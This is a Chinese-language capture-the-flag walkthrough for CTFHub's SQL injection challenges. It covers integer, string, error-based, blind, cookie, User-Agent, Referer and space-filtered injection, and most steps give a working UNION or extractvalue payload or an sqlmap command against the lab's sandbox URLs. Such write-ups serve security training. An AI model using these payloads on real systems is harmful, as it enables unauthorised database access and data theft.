CTFHub-Web-SQL注入

发布于:2024-04-30 ⋅ 阅读:(27) ⋅ 点赞:(0)

CTFHub-SQL注入-WP

1.整数型注入

1.题目说输入1,先将1输入查看结果

image-20240426094709273

2.接着输入4-1,发现输出的结果为4-1,判定存在整数型注入

image-20240426094758504

3.查询字段数,出现了回显,判断这里的字段数为2

1 order by 2

image-20240426095425533

4.判断注入点在2的位置,也就是data

-1 union select 1,2

image-20240426095923023

5.查询数据库名,得知为sqli

-1 union select 1,database()

image-20240426100229901

6.查询该库下的表名,得知为news、flag

-1 union select 1,(select table_name from information_schema.tables where table_schema='sqli' limit 0,1)

-1 union select 1,(select table_name from information_schema.tables where table_schema='sqli' limit 1,1)

image-20240426100610397

image-20240426100638332

7.查询flag表下的字段

-1 union select 1,(select column_name from information_schema.columns where table_schema='sqli' and table_name='flag' limit 0,1)

image-20240426100722033

8.发现了flag字段,去查询flag字段的内容,最终得到flag

image-20240426100815439

2.字符型注入

1.输入1=2,回显正常

image-20240426104613806

2.输入1’,发现报错,判断为字符型注入

image-20240426104639055

3.第一关已经了解数据库版本,数据库sqli,列数,以及注入点,所以直接爆表名

-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

image-20240426104819171

4.还是熟悉的news和flag,按照之前的流程继续爆字段名

-1' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag'#

image-20240426104857111

5.回显正常,继续爆字段内容,得到flag

-1' union select 1,(select flag from flag)#

image-20240426104930242

3.报错注入

1.输入1’发现报错的回显,判断为报错注入

image-20240426112044792

2.使用extractvalue()函数进行注入爆库

1 and extractvalue(null,concat(0x7e,(database()),0x7e))

image-20240426112325312

3.发现库名为sqli,继续爆表,发现第一个表名为flag

1 and extractvalue(null,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e))

image-20240426112423070

4.继续爆字段名,发现flag字段

1 and extractvalue(null,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='flag' limit 0,1),0x7e))

image-20240426112537932

5.爆字段内容得到flag

1 and extractvalue(null,concat(0x7e,(select flag from flag limit 0,1),0x7e))

image-20240426112622135

4.布尔盲注

1.输入1,返回结果为成功

image-20240426114554280

2.输入1’,返回结果为失败,判断为布尔类型,只会返回成功和失败

image-20240426114625543

3.直接使用SQLMap工具进行盲注,结果得出sqli库,其他三个都是系统库

sqlmap -u "http://challenge-58edc2cbdbfb94a0.sandbox.ctfhub.com:10800/?id=1" --dbs

image-20240426115739362

4.接着进行爆表,得到flag表和news表

sqlmap -u "http://challenge-58edc2cbdbfb94a0.sandbox.ctfhub.com:10800/?id=1" -D sqli --tables

image-20240426120333736

5.直接爆flag表的字段内容,得到flag

qlmap -u "http://challenge-58edc2cbdbfb94a0.sandbox.ctfhub.com:10800/?id=1" -T flag columns --dump

image-20240426121158786

5.时间盲注

1.打开又看到跟之前相同的界面

image-20240429174423872

2.根据之前注入的逻辑,直接构造SQLMap的命令进行注入

sqlmap -u "http://challenge-5ef64e08cdb2fa76.sandbox.ctfhub.com:10800/?id=-1" -D sqli -T flag -C flag --dump

image-20240429174615170

3.得到flag

image-20240429174634606

6.MySQL注入

1.这个和之前的不同,要自己去手工注入得到表名和字段名,因为之前已经知道库名了,所以直接注入

-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'

image-20240429180229727

2.得到表名之后,继续注入获取字段名

-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='eppymlmhfq'

image-20240429180352116

3.得到字段名之后,查询字段内容得到flag

-1 union select 1,group_concat(itcwfaaoes) from eppymlmhfq

image-20240429180505813

7.cookie注入

1.打开页面,先用SQLMap跑一下

image-20240429180947338

2.爆库名,其他三个是系统库,老样子目标还是sqli

sqlmap -u "http://challenge-a1691f4d202d9668.sandbox.ctfhub.com:10800/" --cookie "id=1" --dbs --level 2

image-20240429181638557

image-20240429181654950

3.爆表名

sqlmap -u "http://challenge-a1691f4d202d9668.sandbox.ctfhub.com:10800/" --cookie "id=1" -D sqli --tables --level 2

image-20240429181743823

4.最后爆表内字段的数据

sqlmap -u "http://challenge-a1691f4d202d9668.sandbox.ctfhub.com:10800/" --cookie "id=1" -D sqli -T btnogjokyv --columns --dump --level 2

image-20240429181824767

8.UA注入

1.跟之前的cookie很像,接着爆库名

-1 union select 1, database()

image-20240429195629577

2.爆表名

-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'

image-20240429195719726

3.爆字段名

-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='eovrhvzjra'

image-20240429202409137

4.爆字段内容

-1 union select 1,group_concat(nxqsvjgwpv) from eovrhvzjra

image-20240429202732583

9.Refer注入

Referer:-1 union select 1, database()

image-20240429203835362

-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'

image-20240429203912675

-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='ohixnyyvlj'

image-20240429204054459

4.image-20240429204200880

-1 union select 1,group_concat(mcwfssybmd) from ohixnyyvlj

10.过滤空格

1.在URL中进行注入,过滤空格的意思就是不能输入空格,所以换成*进行注入

-1/**/union/**/select/**/1,database()

image-20240429211312428

2.爆库之后接着爆表

-1/**/union/**/select/**/1,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema='sqli'

image-20240429211405054

3.爆表之后接着爆字段名

-1/**/union/**/select/**/1,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=%27sqli%27/**/and/**/table_name=%27ojsuqnqjos%27

image-20240429211523264

4.得到字段名之后爆字段内容得到flag

-1/**/union/**/select/**/1,group_concat(ahsxijxrsv)/**/from/**/sqli.ojsuqnqjos

image-20240429211706316

11.综合训练 SQLI-LABS

无靶场,需要自己搭建

网站公告

今日签到

点亮在社区的每一天
去签到

热门文章

最新发布